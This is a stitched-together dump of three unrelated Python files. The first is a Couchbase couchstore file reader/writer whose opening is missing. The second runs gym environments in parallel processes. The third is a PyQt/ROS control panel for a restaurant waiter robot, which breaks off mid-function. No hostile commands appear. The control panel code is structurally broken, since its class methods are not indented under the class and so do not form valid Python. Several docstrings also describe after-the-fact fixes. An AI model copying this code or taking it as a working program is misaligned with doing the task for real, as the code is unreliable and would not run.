SFD_REV_META = ">QIIBB"  # cas, exp, flg, flex_meta, dtype
SFD_REV_META_PRE_4_6 = ">QIIBBB"  # cas, exp, flg, flex_meta, dtype, conf_res
SFD_REV_SEQ = ">Q"
SFD_DB_SEQ = ">Q"
# Matches data files named "<vbucket_id>.couch.<compaction_number>".
SFD_RE = "^([0-9]+)\\.couch\\.([0-9]+)$"
# TODO: (1) SFDSource - total_msgs.
# TODO: (1) SFDSink - ensure right user for bucket_dir.
# TODO: (1) SFDSink - ensure right user for couchstore file.
class SFDSource(pump.Source):
    """Reads couchstore files from a couchbase server data directory.

    Fix: ``threading.currentThread().getName()`` used the deprecated camelCase
    API (removed from recent Python); replaced with
    ``threading.current_thread().name``.
    """

    def __init__(self, opts, spec, source_bucket, source_node,
                 source_map, sink_map, ctl, cur):
        super(SFDSource, self).__init__(opts, spec, source_bucket, source_node,
                                        source_map, sink_map, ctl, cur)
        self.done = False   # set once the loader has signalled end/error
        self.queue = None   # lazily created in provide_batch()
        print('Starting sfd source: ', spec)

    @staticmethod
    def can_handle(opts, spec: str) -> bool:
        """True when the spec uses the couchstore-files:// scheme."""
        return spec.startswith(SFD_SCHEME)

    @staticmethod
    def check_base(opts, spec: str) -> couchbaseConstants.PUMP_ERROR:
        # Skip immediate superclass Source.check_base(),
        # since SFDSource can handle different vbucket states.
        return pump.EndPoint.check_base(opts, spec)

    @staticmethod
    def check(opts, spec: str) -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[Dict[str, Any]]]:
        """Scan the data dir and describe each bucket that has couchstore files."""
        rv, d = data_dir(spec)
        if rv != 0:
            return rv, None
        buckets = []
        for bucket_dir in sorted(glob.glob(f'{d}/*/')):
            if not glob.glob(f'{bucket_dir}/*.couch.*'):
                continue  # not a bucket data directory
            bucket_name = os.path.basename(os.path.dirname(bucket_dir))
            if not bucket_name:
                return f'error: bucket_name too short: {bucket_dir}', None
            rv, v = SFDSource.vbucket_states(opts, spec, bucket_dir)
            if rv != 0:
                return rv, None
            buckets.append({'name': bucket_name,
                            'nodes': [{'hostname': 'N/A',
                                       'vbucket_states': v}]})
        if not buckets:
            return f'error: no bucket subdirectories at: {d}', None
        return 0, {'spec': spec, 'buckets': buckets}

    @staticmethod
    def vbucket_states(opts, spec, bucket_dir) -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[Dict[str, Any]]]:
        """Reads all the latest couchstore files in a directory, and returns
        map of state string (e.g., 'active') to map of vbucket_id to doc."""
        vbucket_states: Dict[str, Any] = defaultdict(dict)
        for f in latest_couch_files(bucket_dir):
            vbucket_id = int(re.match(SFD_RE, os.path.basename(f)).group(1))  # type: ignore
            try:
                store = couchstore.CouchStore(f, 'r')
                try:
                    doc_str = store.localDocs['_local/vbstate']
                    if doc_str:
                        doc = json.loads(doc_str)
                        state = doc.get('state', None)
                        if state:
                            vbucket_states[state][vbucket_id] = doc
                        else:
                            return f'error: missing vbucket_state from: {f}', None
                except Exception as e:
                    return f'error: could not read _local/vbstate from: {f}; exception: {e}', None
                store.close()
            except Exception as e:
                return f'error: could not read couchstore file: {f}; exception: {e}', None
        if vbucket_states:
            return 0, vbucket_states
        return f'error: no vbucket_states in files: {bucket_dir}', None

    @staticmethod
    def provide_design(opts, source_spec: str, source_bucket, source_map) -> Tuple[couchbaseConstants.PUMP_ERROR,
                                                                                   Optional[str]]:
        """Return design documents (views) from the bucket's master store as JSON."""
        rv, d = data_dir(source_spec)
        if rv != 0:
            return rv, None
        bucket_dir = f'{d}/{source_bucket["name"]}'
        if not os.path.isdir(bucket_dir):
            return 0, None  # no bucket dir means no designs, not an error
        rv, store, _ = open_latest_store(bucket_dir, "master.couch.*", "^(master)\\.couch\\.([0-9]+)$",
                                         "master.couch.0", mode='r')
        if rv != 0 or not store:
            return rv, None
        rows = []
        for doc_info in store.changesSince(0):
            if not doc_info.deleted:
                try:
                    doc_contents = doc_info.getContents(options=couchstore.CouchStore.DECOMPRESS)
                except Exception as e:
                    return f'error: could not read design doc: {doc_info.id}; source_spec: {source_spec};' \
                           f' exception: {e}', None
                try:
                    doc = json.loads(doc_contents)
                except ValueError as e:
                    return f'error: could not parse design doc: {doc_info.id}; source_spec: {source_spec};' \
                           f' exception: {e}', None
                doc['id'] = doc.get('id', doc_info.id)
                doc['_rev'] = doc.get('_rev', doc_info.revSequence)
                rows.append({'id': doc_info.id, 'doc': doc})
        store.close()
        return 0, json.dumps(rows)

    def provide_batch(self) -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[pump.Batch]]:
        """Return the next (rv, batch); spawns the loader thread on first call."""
        if self.done:
            return 0, None
        if not self.queue:
            # Deprecated-API fix: current_thread().name replaces
            # currentThread().getName().
            name = "c" + threading.current_thread().name[1:]
            self.queue = queue.Queue(2)
            self.thread = threading.Thread(target=self.loader, name=name)
            self.thread.daemon = True
            self.thread.start()
        rv, batch = self.queue.get()
        self.queue.task_done()
        if rv != 0 or batch is None:
            self.done = True
        return rv, batch

    def loader(self):
        """Background thread: stream messages out of couchstore files in batches."""
        rv, d = data_dir(self.spec)
        if rv != 0:
            self.queue.put((rv, None))
            return
        source_vbucket_state = \
            getattr(self.opts, 'source_vbucket_state', 'active')
        source_nodes = self.source_bucket['nodes']
        if len(source_nodes) != 1:
            self.queue.put((f'error: expected 1 node in source_bucket: {self.source_bucket["name"]}', None))
            return
        vbucket_states = source_nodes[0].get('vbucket_states', None)
        if not vbucket_states:
            self.queue.put((f'error: missing vbucket_states in source_bucket: {self.source_bucket["name"]}', None))
            return
        vbuckets = vbucket_states.get(source_vbucket_state, None)
        if vbuckets is None:  # Empty dict is valid.
            self.queue.put((f'error: missing vbuckets in source_bucket: {self.source_bucket["name"]}', None))
            return
        batch_max_size = self.opts.extra['batch_max_size']
        batch_max_bytes = self.opts.extra['batch_max_bytes']
        store = None
        vbucket_id = None
        # Level of indirection since we can't use python 3 nonlocal statement.
        abatch: List[pump.Batch] = [pump.Batch(self)]

        def change_callback(doc_info):
            if doc_info:
                # Handle the new key name spacing for collections and co
                cid, key = decode_collection_id(doc_info.id.encode())
                # Only support keys in the _default collection
                if cid != 0:
                    logging.debug('Skipping as not default collection')
                    return
                if self.skip(key, vbucket_id):
                    return
                if doc_info.deleted:
                    cmd = couchbaseConstants.CMD_DCP_DELETE
                else:
                    cmd = couchbaseConstants.CMD_DCP_MUTATION
                # Deletes/Tombstone can contains a body
                val = doc_info.getContents(options=couchstore.CouchStore.DECOMPRESS)
                try:
                    rev_meta_bytes = doc_info.revMeta.get_bytes()
                    if len(rev_meta_bytes) == 18:
                        conf_res = 0
                        cas, exp, flg, flex_meta, dtype = struct.unpack(SFD_REV_META, rev_meta_bytes)
                    elif len(rev_meta_bytes) == 19:
                        cas, exp, flg, flex_meta, dtype, conf_res = struct.unpack(SFD_REV_META_PRE_4_6, rev_meta_bytes)
                    else:
                        raise ValueError('Does not match pre- or post-4.6 format')
                    meta = int(doc_info.revSequence).to_bytes(8, 'big')
                    seqno = doc_info.sequence
                    nmeta = 0
                    msg = (cmd, vbucket_id, key, flg, exp, cas, meta, val, seqno, dtype, nmeta, conf_res)
                    abatch[0].append(msg, len(val))
                except Exception as e:
                    self.queue.put((f'error: could not read couchstore file due to unsupported file format version;'
                                    f' exception: {e}', None))
                    return
                if (abatch[0].size() >= batch_max_size or
                        abatch[0].bytes >= batch_max_bytes):
                    self.queue.put((0, abatch[0]))
                    abatch[0] = pump.Batch(self)

        for f in latest_couch_files(f'{d}/{self.source_bucket["name"]}'):
            vbucket_id = int(re.match(SFD_RE, os.path.basename(f)).group(1))
            if vbucket_id not in vbuckets:
                continue
            try:
                store = couchstore.CouchStore(f, 'r')
                store.forEachChange(0, change_callback)
                store.close()
            except Exception:
                # MB-12270: Some files may be deleted due to compaction. We can
                # safely ignore them and move to next file.
                pass
        if abatch[0].size():
            self.queue.put((0, abatch[0]))
        self.queue.put((0, None))  # sentinel: end of stream
class SFDSink(pump.Sink):
    """Sink for couchstore in couchbase server/file/directory layout."""
    def __init__(self, opts, spec, source_bucket, source_node,
                 source_map, sink_map, ctl, cur):
        super(SFDSink, self).__init__(opts, spec, source_bucket, source_node,
                                      source_map, sink_map, ctl, cur)
        # Optional re-hashing of keys onto vbuckets (off unless opts.extra sets it).
        self.rehash = opts.extra.get("rehash", 0)
        self.init_worker(SFDSink.run)
    @staticmethod
    def run(self):
        """Worker loop: pull batches and persist each vbucket's messages into
        its couchstore file.

        NOTE(review): declared @staticmethod yet takes ``self`` — presumably
        init_worker invokes it with the instance passed explicitly; confirm
        against pump.Sink.
        """
        destination_vbucket_state = getattr(self.opts, 'destination_vbucket_state', 'active')
        vbucket_states = self.source_node.get('vbucket_states', {})
        while not self.ctl['stop']:
            batch, future = self.pull_next_batch()  # type: pump.Batch, pump.SinkBatchFuture
            if not batch:
                # No more batches: resolve the future and exit the worker.
                return self.future_done(future, 0)
            vbuckets = batch.group_by_vbucket_id(SFD_VBUCKETS, self.rehash)
            for vbucket_id, msgs in vbuckets.items():
                checkpoint_id = 0
                max_deleted_seqno = 0
                rv, store, store_path = self.open_store(vbucket_id)
                if rv != 0:
                    return self.future_done(future, rv)
                bulk_keys = []
                bulk_vals = []
                for i, msg in enumerate(msgs):
                    cmd, _vbucket_id, key, flg, exp, cas, meta, val, seqno, dtype, nmeta, conf_res = msg
                    if self.skip(key, vbucket_id):
                        continue
                    # TODO: add default collection to all keys in CC this should change to have the correct collection
                    key = encode_collection_id(0) + key
                    d = couchstore.DocumentInfo(key.decode())
                    flex_meta = 1
                    d.revMeta = struct.pack(SFD_REV_META, cas, exp, flg, flex_meta, dtype)
                    if len(meta) != 0:
                        # meta carries the rev sequence; normalize to exactly
                        # 8 big-endian bytes before unpacking.
                        if len(meta) > 8:
                            meta = meta[0:8]
                        if len(meta) < 8:
                            meta = (b'\x00\x00\x00\x00\x00\x00\x00\x00' + meta)[-8:]
                        d.revSequence, = struct.unpack(SFD_REV_SEQ, meta)
                    else:
                        d.revSequence = 1
                    if seqno:
                        d.sequence = int(seqno)
                    if cmd in [couchbaseConstants.CMD_TAP_MUTATION, couchbaseConstants.CMD_DCP_MUTATION]:
                        try:
                            v = val
                            if dtype & 0x01:
                                # datatype bit 0 marks the value as JSON.
                                d.contentType = couchstore.DocumentInfo.IS_JSON
                            # Why do this when we have a flag for it?
                            # if re.match('^\\s*{', v) and json.loads(v) is not None:
                            #     d.contentType = couchstore.DocumentInfo.IS_JSON
                        except ValueError:
                            pass  # NON_JSON is already the default contentType.
                    elif cmd in [couchbaseConstants.CMD_TAP_DELETE, couchbaseConstants.CMD_DCP_DELETE]:
                        v = None
                    else:
                        self.future_done(future, f'error: SFDSink bad cmd: {cmd!s}')
                        store.close()
                        return
                    bulk_keys.append(d)
                    bulk_vals.append(v)
                try:
                    if bulk_keys and bulk_vals:
                        # Carry forward checkpoint/max_deleted_seqno from the
                        # source node's state for this vbucket, if present.
                        vm = vbucket_states.get(destination_vbucket_state, None)
                        if vm:
                            vi = vm.get(vbucket_id, None)
                            if vi:
                                c = int(vi.get("checkpoint_id", checkpoint_id))
                                checkpoint_id = max(checkpoint_id, c)
                                m = int(vi.get("max_deleted_seqno", max_deleted_seqno))
                                max_deleted_seqno = max(max_deleted_seqno, m)
                        rv = self.save_vbucket_state(store, vbucket_id,
                                                     destination_vbucket_state,
                                                     checkpoint_id,
                                                     max_deleted_seqno)
                        if rv != 0:
                            self.future_done(future, rv)
                            store.close()
                            return
                        store.saveMultiple(bulk_keys, bulk_vals,
                                           options=couchstore.CouchStore.COMPRESS)
                        store.commit()
                        store.close()
                except Exception as e:
                    self.future_done(future, f'error: could not save couchstore data; vbucket_id: {vbucket_id}; '
                                             f'store_path: {store_path}; exception: {e}')
                    return
            self.future_done(future, 0)  # No return to keep looping.
    def save_vbucket_state(self, store, vbucket_id,
                           state, checkpoint_id, max_deleted_seqno):
        """Persist vbucket state into the store's _local/vbstate document."""
        doc = json.dumps({'state': state,
                          'checkpoint_id': str(checkpoint_id),
                          'max_deleted_seqno': str(max_deleted_seqno)})
        try:
            store.localDocs['_local/vbstate'] = doc
        except Exception as e:
            return f'error: save_vbucket_state() failed: {e!s}'
        return 0
    @staticmethod
    def can_handle(opts, spec: str) -> bool:
        """True when the spec uses the couchstore-files:// scheme."""
        return spec.startswith(SFD_SCHEME)
    @staticmethod
    def check_base(opts, spec: str) -> couchbaseConstants.PUMP_ERROR:
        if getattr(opts, "destination_operation", None) is not None:
            return f'error: --destination-operation is not supported by this destination: {spec}'
        # Skip immediate superclass Sink.check_base(),
        # since SFDSink can handle different vbucket states.
        return pump.EndPoint.check_base(opts, spec)
    @staticmethod
    def check(opts, spec: str, source_map) -> Tuple[couchbaseConstants.PUMP_ERROR, None]:
        """Validate that the spec's data directory exists and is writable."""
        # TODO: (2) SFDSink - check disk space.
        rv, dir = data_dir(spec)
        if rv != 0:
            return rv, None
        if not os.path.isdir(dir):
            return f'error: not a directory: {dir}', None
        if not os.access(dir, os.W_OK):
            return f'error: directory is not writable: {dir}', None
        return 0, None
    @staticmethod
    def consume_design(opts, sink_spec, sink_map,
                       source_bucket, source_map, source_design) -> couchbaseConstants.PUMP_ERROR:
        """Write design documents (views) into the bucket's master store."""
        if not source_design:
            return 0
        try:
            sd = json.loads(source_design)
        except ValueError:
            return f'error: could not parse source_design: {source_design}'
        rv, d = data_dir(sink_spec)
        if rv != 0:
            return rv
        bucket_dir = f'{d}/{source_bucket["name"]}'
        if not os.path.isdir(bucket_dir):
            os.mkdir(bucket_dir)
        rv, store, _ = open_latest_store(bucket_dir, "master.couch.*", "^(master)\\.couch\\.([0-9]+)$",
                                         "master.couch.1")
        if rv != 0:
            return rv
        bulk_keys = []
        bulk_vals = []
        if sd:
            for row in sd['rows']:
                logging.debug("design_doc row: " + str(row))
                doc_info = couchstore.DocumentInfo(str(row['id']))
                if '_rev' in row['doc']:
                    doc_info.revMeta = str(row['doc']['_rev'])
                    del row['doc']['_rev']
                doc_info.contentType = couchstore.DocumentInfo.IS_JSON
                bulk_keys.append(doc_info)
                bulk_vals.append(json.dumps(row['doc']))
            if bulk_keys and bulk_vals:
                store.saveMultiple(bulk_keys, bulk_vals)  # type: ignore # TODO: Compress ddocs?
        store.commit()  # type: ignore
        store.close()  # type: ignore
        return 0
    def consume_batch_async(self, batch: Optional[pump.Batch]) -> Tuple[couchbaseConstants.PUMP_ERROR,
                                                                        Optional[pump.SinkBatchFuture]]:
        """Queue a batch for the worker thread; returns (rv, future)."""
        return self.push_next_batch(batch, pump.SinkBatchFuture(self, batch))
    def open_store(self, vbucket_id: int):
        """Open (or create) the couchstore file for ``vbucket_id``."""
        # data_dir => /opt/couchbase/var/lib/couchbase/data/
        # bucket_dir => default/
        # store_path => VBUCKET_ID.couch.COMPACTION_NUM
        if vbucket_id >= SFD_VBUCKETS:
            return f'error: vbucket_id too large: {vbucket_id}', None, None
        rv, bucket_dir = self.find_bucket_dir()
        if rv != 0:
            return rv, None, None
        return open_latest_store(bucket_dir, f'{vbucket_id}.couch.*', SFD_RE, f'{vbucket_id!s}.couch.1', mode='c')
    def find_bucket_dir(self) -> Tuple[couchbaseConstants.PUMP_ERROR, str]:
        """Locate (creating if needed) this bucket's subdirectory of the data dir."""
        rv, d = data_dir(self.spec)
        if rv != 0:
            return rv, ''
        bucket_dir = d + '/' + self.source_bucket['name']
        if not os.path.isdir(bucket_dir):
            try:
                os.mkdir(bucket_dir)
            except OSError as e:
                return f'error: could not create bucket_dir: {bucket_dir}; exception: {e}', ''
        return 0, bucket_dir
def open_latest_store(bucket_dir: str, glob_pattern: str, filter_re: str, default_name: str, mode: str = 'c') \
        -> Tuple[couchbaseConstants.PUMP_ERROR, Optional[couchstore.CouchStore], str]:
    """Open the newest couchstore file matching ``glob_pattern`` in ``bucket_dir``.

    In read mode ('r') a missing file yields (0, None, ''); otherwise the
    file named ``default_name`` is created. Returns (rv, store, path).
    """
    candidates = latest_couch_files(bucket_dir,
                                    glob_pattern=glob_pattern,
                                    filter_re=filter_re)
    if not candidates:
        if mode == 'r':
            return 0, None, ''
        candidates = [f'{bucket_dir}/{default_name}']
    if len(candidates) != 1:
        return f'error: no single, latest couchstore file: {glob_pattern}; found: {candidates}', None, ''
    target = candidates[0]
    try:
        return 0, couchstore.CouchStore(str(target), mode), target
    except Exception as e:
        return f'error: could not open couchstore file: {target}; exception: {e}', None, ''
def latest_couch_files(bucket_dir: str, glob_pattern: str = '*.couch.*', filter_re: str = SFD_RE) -> List[str]:
    """Given directory of *.couch.VER files, returns files with largest VER suffixes."""
    latest: Dict[str, Tuple[int, str]] = {}
    for path in glob.glob(f'{bucket_dir}/{glob_pattern}'):
        m = re.match(filter_re, os.path.basename(path))
        if not m:
            continue
        name, version = m.group(1), int(m.group(2))
        best_version, _ = latest.get(name, (-1, None))  # type: ignore
        if version > best_version:
            latest[name] = (version, path)
    return sorted(path for _, path in latest.values())
def data_dir(spec: str) -> Tuple[couchbaseConstants.PUMP_ERROR, str]:
    """Extract and normalize the directory part of a couchstore-files:// spec.

    Returns (0, path) on success, or (error-string, '') when the scheme is
    wrong or the directory component is empty.
    """
    if not spec.startswith(SFD_SCHEME):
        return f'error: wrong scheme in spec: {spec}', ''
    path = spec[len(SFD_SCHEME):]
    if not path:
        return f'error: missing dir in spec: {spec}', ''
    return 0, os.path.normpath(path)
|
penv.py | from multiprocessing import Process, Pipe
import gym
def worker(conn, env):
    """Remote worker loop: serve ("step"|"reset") commands arriving on conn.

    "step" runs env.step(action), auto-resetting on episode end, and sends
    back (obs, reward, done, info); "reset" sends back the fresh observation.
    Any other command raises NotImplementedError. Runs until the process dies.
    """
    while True:
        cmd, payload = conn.recv()
        if cmd == "reset":
            conn.send(env.reset())
        elif cmd == "step":
            obs, reward, done, info = env.step(payload)
            if done:
                # Start a new episode so the caller always gets a live obs.
                obs = env.reset()
            conn.send((obs, reward, done, info))
        else:
            raise NotImplementedError
class ParallelEnv(gym.Env):
    """A concurrent execution of environments in multiple processes.

    envs[0] runs in the parent process; every other env gets its own daemon
    worker process driven through a Pipe (see worker()).
    """
    def __init__(self, envs):
        assert len(envs) >= 1, "No environment given."
        self.envs = envs
        # Spaces are taken from the first env; assumes all envs share the
        # same observation/action spaces — TODO confirm.
        self.observation_space = self.envs[0].observation_space
        self.action_space = self.envs[0].action_space
        self.locals = []
        # envs[0] is executed locally in this process, so only envs[1:] are
        # given worker processes.
        for env in self.envs[1:]:
            local, remote = Pipe()
            self.locals.append(local)
            p = Process(target=worker, args=(remote, env))
            p.daemon = True  # workers die with the parent process
            p.start()
            remote.close()  # parent keeps only the local end of the pipe
    def reset(self):
        """Reset all envs; returns a list of observations (env 0 first)."""
        for local in self.locals:
            local.send(("reset", None))
        results = [self.envs[0].reset()] + [local.recv() for local in self.locals]
        return results
    def step(self, actions):
        """Step every env with its action; returns zipped (obs, rewards, dones, infos).

        actions[0] is applied to the local env here (with auto-reset on done,
        mirroring worker()); actions[1:] go to the worker processes.
        """
        for local, action in zip(self.locals, actions[1:]):
            local.send(("step", action))
        obs, reward, done, info = self.envs[0].step(actions[0])
        if done:
            obs = self.envs[0].reset()
        results = zip(*[(obs, reward, done, info)] + [local.recv() for local in self.locals])
        return results
    def render(self):
        raise NotImplementedError
control_panel.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'control.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import Float64
import time
from threading import *
import sys
import os
import cv2
from subprocess import *
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import Point
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
# Shared velocity command published by the teleop button handlers.
move_cmd = Twist()
# Table waypoints as [label, x, y] — presumably map-frame coordinates fed to
# move_base goals via movebase_client(); verify against the map.
t1 = ["t1", 1.47, 5.98]
t2 = ["t2", -2.28, 6.02]
t3 = ["t3", -4.86, 6.15]
t4 = ["t4", 1.68, 9.27]
t5 = ["t5", -2.31, 9.46]
t6 = ["t6", -4.76, 9.46]
t7 = ["t7", 1.68, 13.03]
t8 = ["t8", -2.08, 13.10]
t9 = ["t9", -4.86, 13.16]
charge = [-4.80, -0.75]   # charging-station [x, y]
kitchen = [0.10, -0.36]   # kitchen [x, y]
table_cor = [t1, t2, t3, t4, t5, t6, t7, t8, t9]
# Queued orders as [table_label, tray]; starts holding one empty sentinel list.
table_num = [[]]
# Battery percentage placeholder.
battery = 100
class Ui_waiter_bot(object):
def __init__(self):
    """Initialize UI state flags: nothing stopped, map deletable."""
    super(Ui_waiter_bot, self).__init__()
    self.stop_flag = False  # set True by the emergency stop
    self.map_flag = True    # False once the map is in use by navigation
def movebase_client(self, x_corr, y_corr):
    """Send a move_base goal at (x_corr, y_corr) in the map frame and block
    until it completes; returns the action result, or shuts down ROS if the
    action server never answers."""
    client = actionlib.SimpleActionClient('move_base', MoveBaseAction)
    client.wait_for_server()
    goal = MoveBaseGoal()
    goal.target_pose.header.frame_id = "map"
    goal.target_pose.header.stamp = rospy.Time.now()
    goal.target_pose.pose.position = Point(x_corr, y_corr, 0)
    # Fixed goal orientation (quaternion ~ 90 degree yaw).
    goal.target_pose.pose.orientation.x = 0.0
    goal.target_pose.pose.orientation.y = 0.0
    goal.target_pose.pose.orientation.z = 0.701
    goal.target_pose.pose.orientation.w = 0.712
    client.send_goal(goal)
    if client.wait_for_result():
        return client.get_result()
    rospy.logerr("Action server not available!")
    rospy.signal_shutdown("Action server not available!")
def button_released(self):
    """Teleop: stop the robot when any drive button is released."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 0.0, 0.0
    move_pub.publish(move_cmd)
def fl_button_pressed(self):
    """Teleop: arc forward-left."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 1.0, 2.0
    move_pub.publish(move_cmd)
def f_button_pressed(self):
    """Teleop: drive straight forward."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 1.0, 0.0
    move_pub.publish(move_cmd)
def fr_button_pressed(self):
    """Teleop: arc forward-right."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 1.0, -2.0
    move_pub.publish(move_cmd)
def l_button_pressed(self):
    """Teleop: rotate left in place."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 0.0, 2.0
    move_pub.publish(move_cmd)
def stop_button_pressed(self):
    """Teleop: halt all motion."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 0.0, 0.0
    move_pub.publish(move_cmd)
def r_button_pressed(self):
    """Teleop: rotate right in place."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = 0.0, -2.0
    move_pub.publish(move_cmd)
def bl_button_pressed(self):
    """Teleop: arc backward-left."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = -1.0, -2.0
    move_pub.publish(move_cmd)
def b_button_pressed(self):
    """Teleop: drive straight backward."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = -1.0, 0.0
    move_pub.publish(move_cmd)
def br_button_pressed(self):
    """Teleop: arc backward-right."""
    global move_cmd
    move_cmd.linear.x, move_cmd.angular.z = -1.0, 2.0
    move_pub.publish(move_cmd)
def manual_map_thread(self):
    """Run manual map creation on a background thread so the UI stays live."""
    Thread(target=self.manual_map_create).start()
def manual_map_create(self):
    """Start gmapping for manual (teleop-driven) map building, unless a map
    already exists; offer to delete an existing, unused map."""
    # NOTE(review): hard-coded absolute path — assumes a fixed install layout.
    path = "/home/adip/catkin_ws/src/waiter_bot_description/map"
    dirc = os.listdir(path)
    if len(dirc) == 0:
        # No map yet: switch the UI to the teleop tab and launch gmapping.
        self.tabWidget.setCurrentIndex(1)
        handle = Popen('roslaunch waiter_bot_description gmapping.launch', shell=True)
        # stop_flag is sampled only once, immediately after launching —
        # presumably the emergency stop is expected to set it beforehand;
        # TODO confirm intended behavior.
        if self.stop_flag:
            handle.kill()
    else:
        # Map files exist: ask whether to delete them.
        msg = QtWidgets.QMessageBox()
        msg.setText("Map already existing. Do you want to delete it?")
        msg.setWindowTitle("Error")
        msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
        retval = msg.exec_()
        if retval == QtWidgets.QMessageBox.Ok:
            if self.map_flag:
                # Map not in use by navigation: safe to delete.
                for f in dirc:
                    os.remove(os.path.join(path, f))
            else:
                msg = QtWidgets.QMessageBox()
                msg.setText("Map in use unable to delete")
                msg.setWindowTitle("Error")
                msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
                retval = msg.exec_()
def autonomous_map_thread(self):
    """Run autonomous map creation on a background thread."""
    Thread(target=self.autonomous_map_create).start()
def autonomous_map_create(self):
    """Build a map autonomously with explore_lite, unless a map already
    exists; offer to delete an existing, unused map.

    Fix: the deletion guard read ``self.map_view`` — an attribute that is
    never assigned anywhere, so choosing "Ok" raised AttributeError. It now
    checks ``self.map_flag``, matching manual_map_create().
    """
    path = "/home/adip/catkin_ws/src/waiter_bot_description/map"
    dirc = os.listdir(path)
    if len(dirc) == 0:
        handle1 = Popen('roslaunch waiter_bot_description auto_navigation.launch', shell=True)
        handle2 = Popen('roslaunch explore_lite explore.launch', shell=True)
        if self.stop_flag:
            handle1.kill()
            handle2.kill()
    else:
        msg = QtWidgets.QMessageBox()
        msg.setText("Map already existing. Do you want to delete it?")
        msg.setWindowTitle("Error")
        msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
        retval = msg.exec_()
        if retval == QtWidgets.QMessageBox.Ok:
            if self.map_flag:  # was: self.map_view (undefined attribute)
                for f in dirc:
                    os.remove(os.path.join(path, f))
            else:
                msg = QtWidgets.QMessageBox()
                msg.setText("Map in use unable to delete")
                msg.setWindowTitle("Error")
                msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
                retval = msg.exec_()
def map_view_thread(self):
    """Run the map save/view action on a background thread."""
    Thread(target=self.map_view_button).start()
def map_view_button(self):
    """Save the current map when none exists yet; otherwise display the
    previously saved map image."""
    path = "/home/adip/catkin_ws/src/waiter_bot_description/map"
    if not os.listdir(path):
        # No saved map: dump the live one via map_server.
        Popen('rosrun map_server map_saver -f ~/catkin_ws/src/waiter_bot_description/map/map1', shell=True)
        return
    image = cv2.imread('/home/adip/catkin_ws/src/waiter_bot_description/map/map1.pgm')
    cv2.imshow('image window', image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
def emergency_stop_thread(self):
    """Run the emergency stop on a background thread."""
    Thread(target=self.emergency_stop_button).start()
def emergency_stop_button(self):
    """Emergency stop: flag all workers, zero the velocity command, and
    cancel any active move_base goal."""
    global move_cmd
    self.stop_flag = True
    move_cmd.linear.x, move_cmd.angular.z = 0.0, 0.0
    move_pub.publish(move_cmd)
    # Best-effort cancel of the current navigation goal.
    Popen('rostopic pub /move_base/cancel actionlib_msgs/GoalID -- {}', shell=True)
def start_auto_nav_thread(self):
    """Start autonomous navigation on a background thread."""
    Thread(target=self.start_auto_nav_button).start()
def start_auto_nav_button(self):
    """Launch waypoint navigation; kill the launch if emergency stop is set.

    Fix: the original called ``handle1.kill()`` but the process was bound to
    ``handle`` — a guaranteed NameError on the stop path.
    """
    self.map_flag = False  # map is now in use; blocks map deletion
    handle = Popen('roslaunch waiter_bot_description navigation.launch', shell=True)
    if self.stop_flag:
        handle.kill()
def selectError(self):
    """Warn the user that a tray must be chosen before picking a table."""
    box = QtWidgets.QMessageBox()
    box.setText("Please select the tray number first than click on the respective table number")
    box.setWindowTitle("Error")
    box.setStandardButtons(QtWidgets.QMessageBox.Cancel)
    box.exec_()
def duplicateError(self):
    """Warn the user that the chosen tray is already assigned to a table."""
    box = QtWidgets.QMessageBox()
    box.setText("Selected tray already assigned to another table please select a different tray")
    box.setWindowTitle("Error")
    box.setStandardButtons(QtWidgets.QMessageBox.Cancel)
    box.exec_()
def check_tray(self, tray):
    """Return True when ``tray`` is not yet assigned to any table."""
    global table_num
    if not table_num:
        return True
    return not any(tray in entry for entry in table_num)
def max_tray(self):
    """Warn the user that all five trays are already allocated."""
    box = QtWidgets.QMessageBox()
    box.setText("All trays occupied. Maximum 5 order allotment")
    box.setWindowTitle("Error")
    box.setStandardButtons(QtWidgets.QMessageBox.Cancel)
    box.exec_()
def table1_button(self):
    """Queue an order for table 1 with the tray chosen in its combo box."""
    global table_num
    content = self.comboBox.currentText()
    if content == "Select":
        self.selectError()
    elif len(table_num) > 5:
        self.max_tray()
    elif not table_num or self.check_tray(content):
        table_num.append(["t1", content])
    else:
        self.duplicateError()
def table2_button(self):
    """Queue an order for table 2 with the tray chosen in its combo box."""
    global table_num
    content = self.comboBox_3.currentText()
    if content == "Select":
        self.selectError()
    elif len(table_num) > 5:
        self.max_tray()
    elif not table_num or self.check_tray(content):
        table_num.append(["t2", content])
    else:
        self.duplicateError()
def table3_button(self):
    """Queue an order for table 3 with the tray chosen in its combo box."""
    global table_num
    content = self.comboBox_2.currentText()
    if content == "Select":
        self.selectError()
    elif len(table_num) > 5:
        self.max_tray()
    elif not table_num or self.check_tray(content):
        table_num.append(["t3", content])
    else:
        self.duplicateError()
def table4_button(self):
    """Queue an order for table 4 with the tray chosen in its combo box."""
    global table_num
    content = self.comboBox_4.currentText()
    if content == "Select":
        self.selectError()
    elif len(table_num) > 5:
        self.max_tray()
    elif not table_num or self.check_tray(content):
        table_num.append(["t4", content])
    else:
        self.duplicateError()
def table5_button(self):
    """Queue an order for table 5 with the tray chosen in its combo box."""
    global table_num
    content = self.comboBox_5.currentText()
    if content == "Select":
        self.selectError()
    elif len(table_num) > 5:
